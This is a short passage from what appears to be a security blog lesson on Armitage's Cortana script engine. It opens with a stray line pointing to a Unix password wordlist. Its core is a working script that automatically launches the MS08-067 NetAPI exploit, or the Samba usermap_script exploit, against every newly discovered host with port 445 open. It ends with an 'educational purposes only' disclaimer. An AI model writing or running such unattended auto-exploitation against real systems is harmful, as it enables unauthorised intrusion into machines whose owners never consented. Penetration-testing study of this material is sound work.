PASS_FILE => '/opt/framework3/msf3/data/wordlists/unix_passwords.txt'));
}

Cortana Script Engine Lesson 4

Custom Armitage on Host add Auto Exploit via Cortana scripts

# Exploit New Host with microsoft-ds samba with the ms08_067_netapi exploit.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_445 {
println("[*]Exploiting $1 with ms08_067_netapi sploit (" . host_os($1) . ")");
if (host_os($1) eq "Microsoft Windows") {
exploit("windows/smb/ms08_067_netapi", $1);
}
else {
exploit("multi/samba/usermap_script", $1, $null, $null, 1);
}
}

Now have pfun with the Cortana Script Engine ;)

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and its author are in no way responsible for any misuse of the information.